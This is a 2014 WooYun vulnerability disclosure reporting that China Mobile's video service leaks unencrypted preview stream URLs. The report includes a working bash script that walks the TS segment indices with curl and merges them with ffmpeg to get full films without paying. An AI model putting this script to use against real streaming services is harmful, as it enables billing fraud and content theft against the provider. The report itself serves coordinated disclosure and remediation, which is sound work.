当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066487

漏洞标题:中国移动和视界观看影片绕过计费

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2014-06-30 14:31

修复时间:2014-08-14 14:32

公开时间:2014-08-14 14:32

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-30: 细节已通知厂商并且等待厂商处理中
2014-07-05: 厂商已经确认,细节仅向厂商公开
2014-07-15: 细节向核心白帽子及相关领域专家公开
2014-07-25: 细节向普通白帽子公开
2014-08-04: 细节向实习白帽子公开
2014-08-14: 细节向公众公开

简要描述:

移动视频基地和视界电影计费绕过

详细说明:

观看视频时,可以试看前10分钟,ts流如下

BUG.jpg


链接并未加密,且设置简单。可以通过0-end的方式遍历该ts流全部片段来截取全部视频,进而绕过计费。后端并未做控制。

漏洞证明:

ts流.jpg


脚本代码

#!/bin/bash
# lovev.sh
# catch video stream from lovev site.
# merg ts pieces into one video file.
# Created by Xiang Xiao on 31/03/2014.
#
# first parameter indicate the first frame url.
# second parameter indicate the output video file name.
url=$1
fileName=$2
index=0
touch ${index}.ts
echo "start" >${index}.ts
while [ -s ${index}.ts ]
do
index=$(($index+1))
curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" ${url/@0-0/@0-$(($index-1))} > ${index}.ts
#echo ${url/@0-0/@0-$(($index-1))}
#echo $index
echo "have download the ${index} files"
done
command1="cat 0.ts"
for((i=1;i<index;i++))
do
command1=${command1}" "${i}".ts"
done
command1=${command1}" > video.ts"
echo $command1
eval $command1
command2="ffmpeg -i video.ts -qscale 4 -strict -2 "${fileName}".mp4"
echo $command2
eval $command2
rm *.ts


修复方案:

链接加密,或者后端进行完整计费控制

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-07-05 08:49

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国移动集团公司处置。按运行损失评分,rank 13

最新状态:

暂无